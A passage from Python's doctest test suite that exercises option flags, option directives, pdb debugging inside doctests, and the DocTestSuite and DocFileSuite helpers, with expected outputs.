... also matches nothing:
>>> if 1:
... for i in range(100):
... print(i**2, end=' ') #doctest: +ELLIPSIS
... print('!')
0 1...4...9 16 ... 36 49 64 ... 9801 !
... can be surprising; e.g., this test passes:
>>> if 1: #doctest: +ELLIPSIS
... for i in range(20):
... print(i, end=' ')
... print(20)
0 1 2 ...1...2...0
Examples from the docs:
>>> print(list(range(20))) # doctest:+ELLIPSIS
[0, 1, ..., 18, 19]
>>> print(list(range(20))) # doctest: +ELLIPSIS
... # doctest: +NORMALIZE_WHITESPACE
[0, 1, ..., 18, 19]
The SKIP flag causes an example to be skipped entirely. I.e., the
example is not run. It can be useful in contexts where doctest
examples serve as both documentation and test cases, and an example
should be included for documentation purposes, but should not be
checked (e.g., because its output is random, or depends on resources
which would be unavailable.) The SKIP flag can also be used for
'commenting out' broken examples.
>>> import unavailable_resource # doctest: +SKIP
>>> unavailable_resource.do_something() # doctest: +SKIP
>>> unavailable_resource.blow_up() # doctest: +SKIP
Traceback (most recent call last):
...
UncheckedBlowUpError: Nobody checks me.
>>> import random
>>> print(random.random()) # doctest: +SKIP
0.721216923889
The REPORT_UDIFF flag causes failures that involve multi-line expected
and actual outputs to be displayed using a unified diff:
>>> def f(x):
... r'''
... >>> print('\n'.join('abcdefg'))
... a
... B
... c
... d
... f
... g
... h
... '''
>>> # Without the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Expected:
a
B
c
d
f
g
h
Got:
a
b
c
d
e
f
g
TestResults(failed=1, attempted=1)
>>> # With the flag:
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_UDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Differences (unified diff with -expected +actual):
@@ -1,7 +1,7 @@
a
-B
+b
c
d
+e
f
g
-h
TestResults(failed=1, attempted=1)
The REPORT_CDIFF flag causes failures that involve multi-line expected
and actual outputs to be displayed using a context diff:
>>> # Reuse f() from the REPORT_UDIFF example, above.
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_CDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print('\n'.join('abcdefg'))
Differences (context diff with expected followed by actual):
***************
*** 1,7 ****
a
! B
c
d
f
g
- h
--- 1,7 ----
a
! b
c
d
+ e
f
g
TestResults(failed=1, attempted=1)
The REPORT_NDIFF flag causes failures to use the difflib.Differ algorithm
used by the popular ndiff.py utility. This does intraline difference
marking, as well as interline differences.
>>> def f(x):
... r'''
... >>> print("a b c d e f g h i j k l m")
... a b c d e f g h i j k 1 m
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_NDIFF
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 3, in f
Failed example:
print("a b c d e f g h i j k l m")
Differences (ndiff with -expected +actual):
- a b c d e f g h i j k 1 m
? ^
+ a b c d e f g h i j k l m
? + ++ ^
TestResults(failed=1, attempted=1)
The REPORT_ONLY_FIRST_FAILURE suppresses result output after the first
failing example:
>>> def f(x):
... r'''
... >>> print(1) # first success
... 1
... >>> print(2) # first failure
... 200
... >>> print(3) # second failure
... 300
... >>> print(4) # second success
... 4
... >>> print(5) # third failure
... 500
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=3, attempted=5)
However, output from `report_start` is not suppressed:
>>> doctest.DocTestRunner(verbose=True, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
Trying:
print(1) # first success
Expecting:
1
ok
Trying:
print(2) # first failure
Expecting:
200
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=3, attempted=5)
The FAIL_FAST flag causes the runner to exit after the first failing example,
so subsequent examples are not even attempted:
>>> flags = doctest.FAIL_FAST
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=1, attempted=2)
Specifying both FAIL_FAST and REPORT_ONLY_FIRST_FAILURE is equivalent to
FAIL_FAST only:
>>> flags = doctest.FAIL_FAST | doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
print(2) # first failure
Expected:
200
Got:
2
TestResults(failed=1, attempted=2)
For the purposes of both REPORT_ONLY_FIRST_FAILURE and FAIL_FAST, unexpected
exceptions count as failures:
>>> def f(x):
... r'''
... >>> print(1) # first success
... 1
... >>> raise ValueError(2) # first failure
... 200
... >>> print(3) # second failure
... 300
... >>> print(4) # second success
... 4
... >>> print(5) # third failure
... 500
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> flags = doctest.REPORT_ONLY_FIRST_FAILURE
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
raise ValueError(2) # first failure
Exception raised:
...
ValueError: 2
TestResults(failed=3, attempted=5)
>>> flags = doctest.FAIL_FAST
>>> doctest.DocTestRunner(verbose=False, optionflags=flags).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 5, in f
Failed example:
raise ValueError(2) # first failure
Exception raised:
...
ValueError: 2
TestResults(failed=1, attempted=2)
New option flags can also be registered, via register_optionflag(). Here
we reach into doctest's internals a bit.
>>> unlikely = "UNLIKELY_OPTION_NAME"
>>> unlikely in doctest.OPTIONFLAGS_BY_NAME
False
>>> new_flag_value = doctest.register_optionflag(unlikely)
>>> unlikely in doctest.OPTIONFLAGS_BY_NAME
True
Before 2.4.4/2.5, registering a name more than once erroneously created
more than one flag value. Here we verify that's fixed:
>>> redundant_flag_value = doctest.register_optionflag(unlikely)
>>> redundant_flag_value == new_flag_value
True
Clean up.
>>> del doctest.OPTIONFLAGS_BY_NAME[unlikely]
"""
def option_directives(): r"""
Tests of `DocTestRunner`'s option directive mechanism.
Option directives can be used to turn option flags on or off for a
single example. To turn an option on for an example, follow that
example with a comment of the form ``# doctest: +OPTION``:
>>> def f(x): r'''
... >>> print(list(range(10))) # should fail: no ellipsis
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # doctest: +ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
To turn an option off for an example, follow that example with a
comment of the form ``# doctest: -OPTION``:
>>> def f(x): r'''
... >>> print(list(range(10)))
... [0, 1, ..., 9]
...
... >>> # should fail: no ellipsis
... >>> print(list(range(10))) # doctest: -ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False,
... optionflags=doctest.ELLIPSIS).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 6, in f
Failed example:
print(list(range(10))) # doctest: -ELLIPSIS
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
Option directives affect only the example that they appear with; they
do not change the options for surrounding examples:
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail: no ellipsis
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # doctest: +ELLIPSIS
... [0, 1, ..., 9]
...
... >>> print(list(range(10))) # Should fail: no ellipsis
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
**********************************************************************
File ..., line 8, in f
Failed example:
print(list(range(10))) # Should fail: no ellipsis
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=2, attempted=3)
Multiple options may be modified by a single option directive. They
may be separated by whitespace, commas, or both:
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS,+NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
>>> def f(x): r'''
... >>> print(list(range(10))) # Should fail
... [0, 1, ..., 9]
... >>> print(list(range(10))) # Should succeed
... ... # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
... # doctest: +ELLIPSIS
**********************************************************************
File ..., line 2, in f
Failed example:
print(list(range(10))) # Should fail
Expected:
[0, 1, ..., 9]
Got:
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TestResults(failed=1, attempted=2)
The option directive may be put on the line following the source, as
long as a continuation prompt is used:
>>> def f(x): r'''
... >>> print(list(range(10)))
... ... # doctest: +ELLIPSIS
... [0, 1, ..., 9]
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
For examples with multi-line source, the option directive may appear
at the end of any line:
>>> def f(x): r'''
... >>> for x in range(10): # doctest: +ELLIPSIS
... ... print(' ', x, end='', sep='')
... 0 1 2 ... 9
...
... >>> for x in range(10):
... ... print(' ', x, end='', sep='') # doctest: +ELLIPSIS
... 0 1 2 ... 9
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=2)
If more than one line of an example with multi-line source has an
option directive, then they are combined:
>>> def f(x): r'''
... Should fail (option directive not on the last line):
... >>> for x in range(10): # doctest: +ELLIPSIS
... ... print(x, end=' ') # doctest: +NORMALIZE_WHITESPACE
... 0 1 2...9
... '''
>>> test = doctest.DocTestFinder().find(f)[0]
>>> doctest.DocTestRunner(verbose=False).run(test)
TestResults(failed=0, attempted=1)
It is an error to have a comment of the form ``# doctest:`` that is
*not* followed by words of the form ``+OPTION`` or ``-OPTION``, where
``OPTION`` is an option that has been registered with
`register_optionflag`:
>>> # Error: Option not registered
>>> s = '>>> print(12) #doctest: +BADOPTION'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
ValueError: line 1 of the doctest for s has an invalid option: '+BADOPTION'
>>> # Error: No + or - prefix
>>> s = '>>> print(12) #doctest: ELLIPSIS'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
ValueError: line 1 of the doctest for s has an invalid option: 'ELLIPSIS'
It is an error to use an option directive on a line that contains no
source:
>>> s = '>>> # doctest: +ELLIPSIS'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
ValueError: line 0 of the doctest for s has an option directive on a line with no example: '# doctest: +ELLIPSIS'
"""
def test_testsource(): r"""
Unit tests for `testsource()`.
The testsource() function takes a module and a name, finds the (first)
test with that name in that module, and converts it to a script. The
example code is converted to regular Python code. The surrounding
words and expected output are converted to comments:
>>> import test.test_doctest
>>> name = 'test.test_doctest.sample_func'
>>> print(doctest.testsource(test.test_doctest, name))
# Blah blah
#
print(sample_func(22))
# Expected:
## 44
#
# Yee ha!
<BLANKLINE>
>>> name = 'test.test_doctest.SampleNewStyleClass'
>>> print(doctest.testsource(test.test_doctest, name))
print('1\n2\n3')
# Expected:
## 1
## 2
## 3
<BLANKLINE>
>>> name = 'test.test_doctest.SampleClass.a_classmethod'
>>> print(doctest.testsource(test.test_doctest, name))
print(SampleClass.a_classmethod(10))
# Expected:
## 12
print(SampleClass(0).a_classmethod(10))
# Expected:
## 12
<BLANKLINE>
"""
def test_debug(): r"""
Create a docstring that we want to debug:
>>> s = '''
... >>> x = 12
... >>> print(x)
... 12
... '''
Create some fake stdin input, to feed to the debugger:
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput(['next', 'print(x)', 'continue'])
Run the debugger on the docstring, and then restore sys.stdin.
>>> try: doctest.debug_src(s)
... finally: sys.stdin = real_stdin
> <string>(1)<module>()
(Pdb) next
12
--Return--
> <string>(1)<module>()->None
(Pdb) print(x)
12
(Pdb) continue
"""
if not hasattr(sys, 'gettrace') or not sys.gettrace():
def test_pdb_set_trace():
"""Using pdb.set_trace from a doctest.
You can use pdb.set_trace from a doctest. To do so, you must
retrieve the set_trace function from the pdb module at the time
you use it. The doctest module changes sys.stdout so that it can
capture program output. It also temporarily replaces pdb.set_trace
with a version that restores stdout. This is necessary for you to
see debugger output.
>>> doc = '''
... >>> x = 42
... >>> raise Exception('clé')
... Traceback (most recent call last):
... Exception: clé
... >>> import pdb; pdb.set_trace()
... '''
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(doc, {}, "foo-bar@baz", "foo-bar@baz.py", 0)
>>> runner = doctest.DocTestRunner(verbose=False)
To demonstrate this, we'll create a fake standard input that
captures our debugger input:
>>> import tempfile
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(x)', # print data defined by the example
... 'continue', # stop debugging
... ''])
>>> try: runner.run(test)
... finally: sys.stdin = real_stdin
--Return--
> <doctest foo-bar@baz[2]>(1)<module>()->None
-> import pdb; pdb.set_trace()
(Pdb) print(x)
42
(Pdb) continue
TestResults(failed=0, attempted=3)
You can also put pdb.set_trace in a function called from a test:
>>> def calls_set_trace():
... y=2
... import pdb; pdb.set_trace()
>>> doc = '''
... >>> x=1
... >>> calls_set_trace()
... '''
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(y)', # print data defined in the function
... 'up', # out of function
... 'print(x)', # print data defined by the example
... 'continue', # stop debugging
... ''])
>>> try:
... runner.run(test)
... finally:
... sys.stdin = real_stdin
--Return--
> <doctest test.test_doctest.test_pdb_set_trace[8]>(3)calls_set_trace()->None
-> import pdb; pdb.set_trace()
(Pdb) print(y)
2
(Pdb) up
> <doctest foo-bar@baz[1]>(1)<module>()
-> calls_set_trace()
(Pdb) print(x)
1
(Pdb) continue
TestResults(failed=0, attempted=2)
During interactive debugging, source code is shown, even for
doctest examples:
>>> doc = '''
... >>> def f(x):
... ... g(x*2)
... >>> def g(x):
... ... print(x+3)
... ... import pdb; pdb.set_trace()
... >>> f(3)
... '''
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'list', # list source from example 2
... 'next', # return from g()
... 'list', # list source from example 1
... 'next', # return from f()
... 'list', # list source from example 3
... 'continue', # stop debugging
... ''])
>>> try: runner.run(test)
... finally: sys.stdin = real_stdin
... # doctest: +NORMALIZE_WHITESPACE
--Return--
> <doctest foo-bar@baz[1]>(3)g()->None
-> import pdb; pdb.set_trace()
(Pdb) list
1 def g(x):
2 print(x+3)
3 -> import pdb; pdb.set_trace()
[EOF]
(Pdb) next
--Return--
> <doctest foo-bar@baz[0]>(2)f()->None
-> g(x*2)
(Pdb) list
1 def f(x):
2 -> g(x*2)
[EOF]
(Pdb) next
--Return--
> <doctest foo-bar@baz[2]>(1)<module>()->None
-> f(3)
(Pdb) list
1 -> f(3)
[EOF]
(Pdb) continue
**********************************************************************
File "foo-bar@baz.py", line 7, in foo-bar@baz
Failed example:
f(3)
Expected nothing
Got:
9
TestResults(failed=1, attempted=3)
"""
def test_pdb_set_trace_nested():
"""This illustrates more-demanding use of set_trace with nested functions.
>>> class C(object):
... def calls_set_trace(self):
... y = 1
... import pdb; pdb.set_trace()
... self.f1()
... y = 2
... def f1(self):
... x = 1
... self.f2()
... x = 2
... def f2(self):
... z = 1
... z = 2
>>> calls_set_trace = C().calls_set_trace
>>> doc = '''
... >>> a = 1
... >>> calls_set_trace()
... '''
>>> parser = doctest.DocTestParser()
>>> runner = doctest.DocTestRunner(verbose=False)
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(y)', # print data defined in the function
... 'step', 'step', 'step', 'step', 'step', 'step', 'print(z)',
... 'up', 'print(x)',
... 'up', 'print(y)',
... 'up', 'print(foo)',
... 'continue', # stop debugging
... ''])
>>> try:
... runner.run(test)
... finally:
... sys.stdin = real_stdin
... # doctest: +REPORT_NDIFF
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(5)calls_set_trace()
-> self.f1()
(Pdb) print(y)
1
(Pdb) step
--Call--
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(7)f1()
-> def f1(self):
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(8)f1()
-> x = 1
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(9)f1()
-> self.f2()
(Pdb) step
--Call--
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(11)f2()
-> def f2(self):
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(12)f2()
-> z = 1
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(13)f2()
-> z = 2
(Pdb) print(z)
1
(Pdb) up
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(9)f1()
-> self.f2()
(Pdb) print(x)
1
(Pdb) up
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(5)calls_set_trace()
-> self.f1()
(Pdb) print(y)
1
(Pdb) up
> <doctest foo-bar@baz[1]>(1)<module>()
-> calls_set_trace()
(Pdb) print(foo)
*** NameError: name 'foo' is not defined
(Pdb) continue
TestResults(failed=0, attempted=2)
"""
def test_DocTestSuite():
"""DocTestSuite creates a unittest test suite from a doctest.
We create a Suite by providing a module. A module can be provided
by passing a module object:
>>> import unittest
>>> import test.sample_doctest
>>> suite = doctest.DocTestSuite(test.sample_doctest)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
We can also supply the module by name:
>>> suite = doctest.DocTestSuite('test.sample_doctest')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
The module need not contain any doctest examples:
>>> suite = doctest.DocTestSuite('test.sample_doctest_no_doctests')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=0 errors=0 failures=0>
However, if DocTestSuite finds no docstrings, it raises an error:
>>> try:
... doctest.DocTestSuite('test.sample_doctest_no_docstrings')
... except ValueError as e:
... error = e
>>> print(error.args[1])
has no docstrings
You can prevent this error by passing a DocTestFinder instance with
the `exclude_empty` keyword argument set to False:
>>> finder = doctest.DocTestFinder(exclude_empty=False)
>>> suite = doctest.DocTestSuite('test.sample_doctest_no_docstrings',
... test_finder=finder)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=0 errors=0 failures=0>
We can use the current module:
>>> suite = test.sample_doctest.test_suite()
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
We can supply global variables. If we pass globs, they will be
used instead of the module globals. Here we'll pass an empty
globals, triggering an extra error:
>>> suite = doctest.DocTestSuite('test.sample_doctest', globs={})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=5>
Alternatively, we can provide extra globals. Here we'll make an
error go away by providing an extra global variable:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... extraglobs={'y': 1})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
You can pass option flags. Here we'll cause an extra error
by disabling the blank-line feature:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=5>
You can supply setUp and tearDown functions:
>>> def setUp(t):
... import test.test_doctest
... test.test_doctest.sillySetup = True
>>> def tearDown(t):
... import test.test_doctest
... del test.test_doctest.sillySetup
Here, we installed a silly variable that the test expects:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... setUp=setUp, tearDown=tearDown)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
But the tearDown restores sanity:
>>> import test.test_doctest
>>> test.test_doctest.sillySetup
Traceback (most recent call last):
...
AttributeError: 'module' object has no attribute 'sillySetup'
The setUp and tearDown functions are passed test objects. Here
we'll use the setUp function to supply the missing variable y:
>>> def setUp(test):
... test.globs['y'] = 1
>>> suite = doctest.DocTestSuite('test.sample_doctest', setUp=setUp)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
Here, we didn't need to use a tearDown function because we
modified the test globals, which are a copy of the
sample_doctest module dictionary. The test globals are
automatically cleared for us after a test.
"""
def test_DocFileSuite():
"""We can test tests found in text files using a DocFileSuite.
We create a suite by providing the names of one or more text
files that include examples:
>>> import unittest
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
The test files are looked for in the directory containing the
calling module. A package keyword argument can be provided to
specify a different relative location.
>>> import unittest
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... package='test')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
Support for using a package's __loader__.get_data() is also
provided.
>>> import unittest, pkgutil, test
>>> added_loader = False
>>> if not hasattr(test, '__loader__'):
... test.__loader__ = pkgutil.get_loader(test)
... added_loader = True
>>> try:
... suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... package='test')
... suite.run(unittest.TestResult())
... finally:
... if added_loader:
... del test.__loader__
<unittest.result.TestResult run=3 errors=0 failures=2>
'/' should be used as a path separator. It will be converted
to a native separator at run time:
>>> suite = doctest.DocFileSuite('../test/test_doctest.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=1>
If DocFileSuite is used from an interactive session, then files
are resolved relative to the directory of sys.argv[0]:
>>> import types, os.path, test.test_doctest
>>> save_argv = sys.argv
>>> sys.argv = [test.test_doctest.__file__]
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... package=types.ModuleType('__main__'))
>>> sys.argv = save_argv
By setting `module_relative=False`, os-specific paths may be
used (including absolute paths and paths relative to the
working directory):
>>> # Get the absolute path of the test package.
>>> test_doctest_path = os.path.abspath(test.test_doctest.__file__)
>>> test_pkg_path = os.path.split(test_doctest_path)[0]
>>> # Use it to find the absolute path of test_doctest.txt.
>>> test_file = os.path.join(test_pkg_path, 'test_doctest.txt')
>>> suite = doctest.DocFileSuite(test_file, module_relative=False)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=1>
It is an error to specify `package` when `module_relative=False`:
>>> suite = doctest.DocFileSuite(test_file, module_relative=False,
... package='test')
Traceback (most recent call last):
ValueError: Package may only be specified for module-relative paths.
You can specify initial global variables:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... globs={'favorite_color': 'blue'})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=1>
In this case, we supplied a missing favorite color. You can
provide doctest options:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE,
... globs={'favorite_color': 'blue'})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
And, you can provide setUp and tearDown functions:
>>> def setUp(t):
... import test.test_doctest
... test.test_doctest.sillySetup = True
>>> def tearDown(t):
... import test.test_doctest
... del test.test_doctest.sillySetup
Here, we installed a silly variable that the test expects:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... setUp=setUp, tearDown=tearDown)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=1>
But the tearDown restores sanity:
>>> import test.test_doctest
>>> test.test_doctest.sillySetup
Traceback (most recent call last):
...
AttributeError: 'module' object has no attribute 'sillySetup'
The setUp and tearDown functions are passed test objects.
Here, we'll use a setUp function to set the favorite color in
test_doctest.txt:
>>> def setUp(test):
... test.globs['favorite_color'] = 'blue'
>>> suite = doctest.DocFileSuite('test_doctest.txt', setUp=setUp)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=0>
Here, we didn't need to use a tearDown function because we
modified the test globals. The test globals are
automatically cleared for us after a test.
Tests in a file run using `DocFileSuite` can also access the
`__file__` global, which is set to the name of the file
containing the tests:
>>> suite = doctest.DocFileSuite('test_doctest3.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=0>
If the tests contain non-ASCII characters, we have to specify which
encoding the file is encoded with. We do so by using the `encoding`
parameter:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... encoding='utf-8')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
"""
def test_trailing_space_in_test():
"""
Trailing spaces in expected output are significant:
>>> x, y = 'foo', ''
>>> print(x, y)
foo \n
"""
def test_unittest_reportflags():
"""Default unittest reporting flags can be set to control reporting
Here, we'll set the REPORT_ONLY_FIRST_FAILURE option so we see
only the first failure of each test. First, we'll look at the
output without the flag. The test_doctest.txt file has two
tests. They both fail if blank lines are disabled:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE)
>>> import unittest
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
...
Failed example:
if 1:
...
Note that we see both failures displayed.
>>> old = doctest.set_unittest_reportflags(
... doctest.REPORT_ONLY_FIRST_FAILURE)
Now, when we run the test:
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
<BLANKLINE>
<BLANKLINE>
We get only the first failure.
If we give any reporting options when we set up the tests,
however:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE | doctest.REPORT_NDIFF)
Then the default reporting options are ignored:
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
...
Failed example:
if 1:
print('a')
print()
print('b')
Differences (ndiff with -expected +actual):
a
- <BLANKLINE>
+
b
<BLANKLINE>
<BLANKLINE>
Test runners can restore the formatting flags after they run:
>>> ignored = doctest.set_unittest_reportflags(old)
"""
def test_testfile(): r"""
Tests for the `testfile()` function. This function runs all the
doctest examples in a given file. In its simple invocation, it is
called with the name of a file, which is taken to be relative to the
calling module. The return value is (#failures, #tests).
We don't want `-v` in sys.argv for these tests.
>>> save_argv = sys.argv
>>> if '-v' in sys.argv:
... sys.argv = [arg for arg in save_argv if arg != '-v']
>>> doctest.testfile('test_doctest.txt') # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
**********************************************************************
1 items had failures:
1 of 2 in test_doctest.txt
***Test Failed*** 1 failures.
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
(Note: we'll be clearing doctest.master after each call to
`doctest.testfile`, to suppress warnings about multiple tests with the
same name.)
Globals may be specified with the `globs` and `extraglobs` parameters:
